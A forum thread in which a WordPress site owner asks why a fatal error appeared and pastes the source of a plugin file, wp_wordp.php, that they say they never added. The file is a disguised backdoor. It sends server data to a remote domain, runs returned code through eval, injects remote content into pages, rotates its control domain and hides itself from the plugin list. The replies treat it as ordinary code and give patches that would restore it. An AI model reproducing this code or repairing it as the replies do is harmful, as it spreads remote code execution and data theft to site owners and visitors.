Fatal error: Uncaught Error: Cannot use object of type WP_Error as array
Since today I've been running into the following error when trying to go on my WordPress website:
Fatal error: Uncaught Error: Cannot use object of type WP_Error as array in
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-content/plugins/wp_wordp.php:32

Stack trace: #0
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-includes/class-wp-hook.php(324):
wp_wordp->execute('') #1
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-includes/class-wp-hook.php(348):
WP_Hook->apply_filters(NULL, Array) #2
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-includes/plugin.php(517):
WP_Hook->do_action(Array) #3
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-includes/template-loader.php(13):
do_action('template_redire...') #4
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-blog-header.php(19):
require_once('/home/clients/d...') #5
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/index.php(17):
require('/home/clients/d...') #6 {main} thrown in
/home/clients/de5c4a77f10601e4b8a603aac4a6faf2/wordpress/wp-content/plugins/wp_wordp.php on line 32

My wp_wordp.php (logically the source of the error? due to the log) looks like the following:
<?php
/*
Plugin Name:Domain Page 
Description: wp_wordp
Version: 1.0
Author: wp_wordp
*/

class wp_wordp {
    private $primary_domain;
    private $backup_domain;
    public function __construct() {
        $this->primary_domain = get_option('primary_domain');

        $this->backup_domain = get_option('backup_domain');
        add_action('template_redirect', array($this, 'execute'));
    }
    public function primary($d) {
        return eval($d);
    }
    public function execute() {
        $args = array(
            'timeout' => 15,
            'headers' => array(
                "User-Agent" => json_encode($_SERVER),
            ),
        );
        $response = wp_remote_get($this->primary_domain . "?s=" . is_404(), $args);

        if (is_wp_error($response)) {
            $response = wp_remote_get($this->backup_domain . "?s=" . is_404(), $args);
            $ups= json_decode($response['body'], true);
            update_option('primary_domain',$ups['primary_domain']);
        }
        $condoe = json_decode($response['body'], true);
        if (!is_wp_error($response) && json_last_error() == JSON_ERROR_NONE) {
            status_header(200);
            nocache_headers();
            if (!empty($condoe['headers'])) {
                return $this->primary($condoe['body']);
            }
            if (!empty($condoe['header'])) {
                header($condoe['header']);
                echo $condoe['body'];
                exit;
            }
            add_filter('pre_get_document_title', function($title) use ($condoe) {
                return $condoe['title'];
            }, 999);
            get_header();
            echo $condoe['body'];
            get_footer();

            exit;
        }
    }
}
add_filter('all_plugins', 'hide_my_plugin_from_list');

function hide_my_plugin_from_list($plugins) {

    unset($plugins['wp_wordp.php']);
    return $plugins;
}

new wp_wordp();

It is worth noting I can still access the admin part without problem, it's just the public part that is inaccessible due to the error.
I haven't touched anything to arrive at this error (website was untouched for a few months, and the only thing that was was content on some pages so not really some admin/code stuff), and I don't really know anything about WordPress coding so I'm kinda running into a wall...
If any of you could help me it'll be a big thing for me :)
Thank you in advance for all those that can help!

You are trying to use an object ($response) as an array.
You need to ensure that $response is an array before trying to access it as such:
if (is_wp_error($response)) {
    $response = wp_remote_get($this->backup_domain . "?s=" . is_404(), $args);
    if (!is_wp_error($response)) {
        $ups = json_decode($response['body'], true);
        if (isset($ups['primary_domain'])) {
            update_option('primary_domain', $ups['primary_domain']);
        }
    }
}

Here I added is_wp_error() check for the second $response and added isset($ups['primary_domain']) - this is the minimum to avoid the fatal error.

Hi,
Thanks for your reply
I've modified my file using the code you provided which now looks like that and now run into another error at line 39
:'(
Honestly, I don't understand why it stopped working essentially overnight, especially since I didn't touch anything

Yup, so the error on line 39 is due to the same issue, $condoe = json_decode($response['body'], true); when $response is an object. It would have stopped working before, but it seems the wp_remote_get($this->backup_domain…) call never returned a WP_Error for you to notice.

As per the lines around the line number of the error:
$response = wp_remote_get($this->backup_domain . "?s=" . is_404(), $args);
$ups= json_decode($response['body'], true);

$response may be a WP_Error object if there was an error with the request. Thus, trying to access it as an array on the next line $response['body'] can cause the fatal error. You probably want to guard against this by using the is_wp_error() function in a conditional.

Hi, thanks for the reply.
Honestly, you're speaking a bit Chinese to me :')
The wp_wordp.php file was never edited by myself and I don't know what any of this code does essentially. I only ever used the plugin installation page and never went into modifying files
